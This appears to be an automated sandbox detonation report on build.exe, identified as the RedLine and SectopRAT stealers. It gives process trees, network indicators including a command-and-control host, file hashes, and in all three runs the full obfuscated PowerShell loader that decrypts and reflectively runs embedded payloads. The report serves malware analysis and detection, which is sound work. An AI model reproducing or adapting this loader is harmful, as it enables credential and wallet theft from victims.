Analysis Overview
SHA256
c34f066c7cb0b738a5c2ffcedcd5ff48b2f8c5247ca38db8739f0c55752318ad
Threat Level: Known bad
The file build.exe was found to be: Known bad.
Malicious Activity Summary
SectopRAT payload
RedLine
RedLine payload
SectopRAT
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Program crash
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-10 18:41
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-10 18:41
Reported
2024-05-10 18:43
Platform
win10-20240404-en
Max time kernel
133s
Max time network
144s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2316 wrote to memory of 4104 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 2316 wrote to memory of 4104 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 4104 wrote to memory of 1164 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4104 wrote to memory of 1164 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4104 wrote to memory of 1164 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('588MiLYguAjRAXC0Hc2WXw/n/VgaxBV5tTGANBIekLk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MsdazbHpBdxaSJsXpo3CXQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YFPPL=New-Object System.IO.MemoryStream(,$param_var); $uAJtb=New-Object System.IO.MemoryStream; $HBPkS=New-Object System.IO.Compression.GZipStream($YFPPL, [IO.Compression.CompressionMode]::Decompress); $HBPkS.CopyTo($uAJtb); $HBPkS.Dispose(); $YFPPL.Dispose(); $uAJtb.Dispose(); $uAJtb.ToArray();}function execute_function($param_var,$param2_var){ $euYUx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wqoRe=$euYUx.EntryPoint; $wqoRe.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$cpZkp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($wXaLJ in $cpZkp) { if ($wXaLJ.StartsWith(':: ')) { $lYvCd=$wXaLJ.Substring(3); break; }}$payloads_var=[string[]]$lYvCd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ii-restored.gl.at.ply.gg | udp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 172.67.75.172:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 172.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat
| MD5 | 23bad6dd1951a20924f5046c913d8ff2 |
| SHA1 | 812500904e0800703382b460c20e0ed3b1ff0b4d |
| SHA256 | 03bbd3b3e518b52769bb9cf6e158cc771869b86b3a5ae74072aa82ac2be739bd |
| SHA512 | 5368bbe4046a080dcdc53774a4197f92adf65c640135bbc3a0cae9111d6d8a6779648b4b68ccd1251c4819c1cd043a7ef88efd4d0bf70ed02eab1dc2ca656e91 |
memory/1164-5-0x0000000073D3E000-0x0000000073D3F000-memory.dmp
memory/1164-8-0x00000000070C0000-0x00000000070F6000-memory.dmp
memory/1164-9-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-10-0x0000000007730000-0x0000000007D58000-memory.dmp
memory/1164-11-0x00000000076B0000-0x00000000076D2000-memory.dmp
memory/1164-12-0x0000000007DD0000-0x0000000007E36000-memory.dmp
memory/1164-13-0x0000000008040000-0x00000000080A6000-memory.dmp
memory/1164-14-0x0000000008180000-0x00000000084D0000-memory.dmp
memory/1164-17-0x00000000080D0000-0x00000000080EC000-memory.dmp
memory/1164-18-0x00000000085D0000-0x000000000861B000-memory.dmp
memory/1164-19-0x00000000088C0000-0x0000000008936000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l5ejdd1o.iaf.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1164-30-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-35-0x000000000A060000-0x000000000A6D8000-memory.dmp
memory/1164-36-0x00000000097E0000-0x00000000097FA000-memory.dmp
memory/1164-37-0x0000000009820000-0x0000000009828000-memory.dmp
memory/1164-38-0x0000000009860000-0x0000000009872000-memory.dmp
memory/1164-39-0x0000000009870000-0x000000000988E000-memory.dmp
memory/1164-42-0x000000000A6E0000-0x000000000ACE6000-memory.dmp
memory/1164-43-0x0000000009940000-0x0000000009952000-memory.dmp
memory/1164-44-0x00000000099E0000-0x0000000009A1E000-memory.dmp
memory/1164-45-0x0000000009B30000-0x0000000009C3A000-memory.dmp
memory/1164-52-0x000000000ACF0000-0x000000000AEB2000-memory.dmp
memory/1164-53-0x000000000B3F0000-0x000000000B91C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpA634.tmp
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
C:\Users\Admin\AppData\Local\Temp\tmpA649.tmp
| MD5 | cae9079afcb4c379869afa5d34181d8a |
| SHA1 | 188e2435c533dd9633f5fcc09f245ddc1a78db2c |
| SHA256 | 2be0a96da90da69fbc34b8e7747e89ce57dfc4fb58ed6c79e0fc21cb7c6791b7 |
| SHA512 | ff7d863ebd1090219f07eaf2ac493f20b6ed11606e7f2c19536d764e730a8bb426fff26dc3890f0503c12329ea4a6c5d8812a0d1b69c19a29fbb8cb8366bd4fd |
C:\Users\Admin\AppData\Local\Temp\tmpA675.tmp
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
memory/1164-360-0x000000000B920000-0x000000000BE1E000-memory.dmp
memory/1164-361-0x000000000AF60000-0x000000000AFF2000-memory.dmp
memory/1164-362-0x000000000AF40000-0x000000000AF5E000-memory.dmp
memory/1164-373-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-374-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-400-0x0000000073D3E000-0x0000000073D3F000-memory.dmp
memory/1164-401-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-402-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-403-0x0000000073D30000-0x000000007441E000-memory.dmp
memory/1164-407-0x0000000073D30000-0x000000007441E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-10 18:41
Reported
2024-05-10 18:44
Platform
win10v2004-20240508-en
Max time kernel
91s
Max time network
96s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2816 wrote to memory of 3560 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 2816 wrote to memory of 3560 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 3560 wrote to memory of 1468 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3560 wrote to memory of 1468 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3560 wrote to memory of 1468 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('588MiLYguAjRAXC0Hc2WXw/n/VgaxBV5tTGANBIekLk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MsdazbHpBdxaSJsXpo3CXQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YFPPL=New-Object System.IO.MemoryStream(,$param_var); $uAJtb=New-Object System.IO.MemoryStream; $HBPkS=New-Object System.IO.Compression.GZipStream($YFPPL, [IO.Compression.CompressionMode]::Decompress); $HBPkS.CopyTo($uAJtb); $HBPkS.Dispose(); $YFPPL.Dispose(); $uAJtb.Dispose(); $uAJtb.ToArray();}function execute_function($param_var,$param2_var){ $euYUx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wqoRe=$euYUx.EntryPoint; $wqoRe.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$cpZkp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($wXaLJ in $cpZkp) { if ($wXaLJ.StartsWith(':: ')) { $lYvCd=$wXaLJ.Substring(3); break; }}$payloads_var=[string[]]$lYvCd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 2.17.196.65:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.196.17.2.in-addr.arpa | udp |
| BE | 2.17.196.65:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ii-restored.gl.at.ply.gg | udp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 172.67.75.172:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 172.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat
| MD5 | 23bad6dd1951a20924f5046c913d8ff2 |
| SHA1 | 812500904e0800703382b460c20e0ed3b1ff0b4d |
| SHA256 | 03bbd3b3e518b52769bb9cf6e158cc771869b86b3a5ae74072aa82ac2be739bd |
| SHA512 | 5368bbe4046a080dcdc53774a4197f92adf65c640135bbc3a0cae9111d6d8a6779648b4b68ccd1251c4819c1cd043a7ef88efd4d0bf70ed02eab1dc2ca656e91 |
memory/1468-3-0x0000000074BCE000-0x0000000074BCF000-memory.dmp
memory/1468-4-0x00000000028A0000-0x00000000028D6000-memory.dmp
memory/1468-5-0x0000000005030000-0x0000000005658000-memory.dmp
memory/1468-6-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-7-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-8-0x0000000005000000-0x0000000005022000-memory.dmp
memory/1468-9-0x0000000005790000-0x00000000057F6000-memory.dmp
memory/1468-10-0x0000000005800000-0x0000000005866000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4efd2oib.ope.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1468-20-0x0000000005880000-0x0000000005BD4000-memory.dmp
memory/1468-21-0x0000000005D80000-0x0000000005D9E000-memory.dmp
memory/1468-22-0x0000000005DD0000-0x0000000005E1C000-memory.dmp
memory/1468-23-0x00000000075D0000-0x0000000007C4A000-memory.dmp
memory/1468-24-0x0000000006360000-0x000000000637A000-memory.dmp
memory/1468-25-0x0000000006390000-0x0000000006398000-memory.dmp
memory/1468-26-0x0000000006F50000-0x0000000006F62000-memory.dmp
memory/1468-27-0x0000000006F70000-0x0000000006F8E000-memory.dmp
memory/1468-28-0x0000000007C50000-0x0000000008268000-memory.dmp
memory/1468-29-0x0000000007050000-0x0000000007062000-memory.dmp
memory/1468-30-0x00000000070B0000-0x00000000070EC000-memory.dmp
memory/1468-31-0x0000000007230000-0x000000000733A000-memory.dmp
memory/1468-32-0x0000000008440000-0x0000000008602000-memory.dmp
memory/1468-33-0x0000000008B40000-0x000000000906C000-memory.dmp
memory/1468-34-0x0000000009620000-0x0000000009BC4000-memory.dmp
memory/1468-35-0x0000000008610000-0x00000000086A2000-memory.dmp
memory/1468-36-0x00000000086B0000-0x0000000008726000-memory.dmp
memory/1468-37-0x0000000008790000-0x00000000087AE000-memory.dmp
memory/1468-38-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-39-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-40-0x0000000074BC0000-0x0000000075370000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp7B23.tmp
| MD5 | 8f5942354d3809f865f9767eddf51314 |
| SHA1 | 20be11c0d42fc0cef53931ea9152b55082d1a11e |
| SHA256 | 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea |
| SHA512 | fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218 |
C:\Users\Admin\AppData\Local\Temp\tmp7B49.tmp
| MD5 | 9df444e0de734921d4d96deeeac4b16e |
| SHA1 | 31542622ecf896b93d830e21595091aef8742901 |
| SHA256 | 1d324d34d58165aca7dbf057a7417457776b4e805d60182401a9275fb7920900 |
| SHA512 | 2de6a0ac09b7a1a21cda31e49c072b097ca1959814c535920a099a9df87e993ba2dfd6cebcb8ec2110efca385bb618f771258575a06736afcfd6cd40a8e1a957 |
C:\Users\Admin\AppData\Local\Temp\tmp7B74.tmp
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\tmp7B90.tmp
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\tmp7B7A.tmp
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\tmp7BBB.tmp
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
memory/1468-217-0x0000000074BCE000-0x0000000074BCF000-memory.dmp
memory/1468-218-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-219-0x0000000074BC0000-0x0000000075370000-memory.dmp
memory/1468-222-0x0000000074BC0000-0x0000000075370000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-10 18:41
Reported
2024-05-10 18:43
Platform
win11-20240426-en
Max time kernel
91s
Max time network
94s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2312 wrote to memory of 1436 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 2312 wrote to memory of 1436 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Windows\SYSTEM32\cmd.exe |
| PID 1436 wrote to memory of 1780 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1436 wrote to memory of 1780 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1436 wrote to memory of 1780 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('588MiLYguAjRAXC0Hc2WXw/n/VgaxBV5tTGANBIekLk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MsdazbHpBdxaSJsXpo3CXQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YFPPL=New-Object System.IO.MemoryStream(,$param_var); $uAJtb=New-Object System.IO.MemoryStream; $HBPkS=New-Object System.IO.Compression.GZipStream($YFPPL, [IO.Compression.CompressionMode]::Decompress); $HBPkS.CopyTo($uAJtb); $HBPkS.Dispose(); $YFPPL.Dispose(); $uAJtb.Dispose(); $uAJtb.ToArray();}function execute_function($param_var,$param2_var){ $euYUx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wqoRe=$euYUx.EntryPoint; $wqoRe.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$cpZkp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($wXaLJ in $cpZkp) { if ($wXaLJ.StartsWith(':: ')) { $lYvCd=$wXaLJ.Substring(3); break; }}$payloads_var=[string[]]$lYvCd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1780 -ip 1780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 2772
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ii-restored.gl.at.ply.gg | udp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
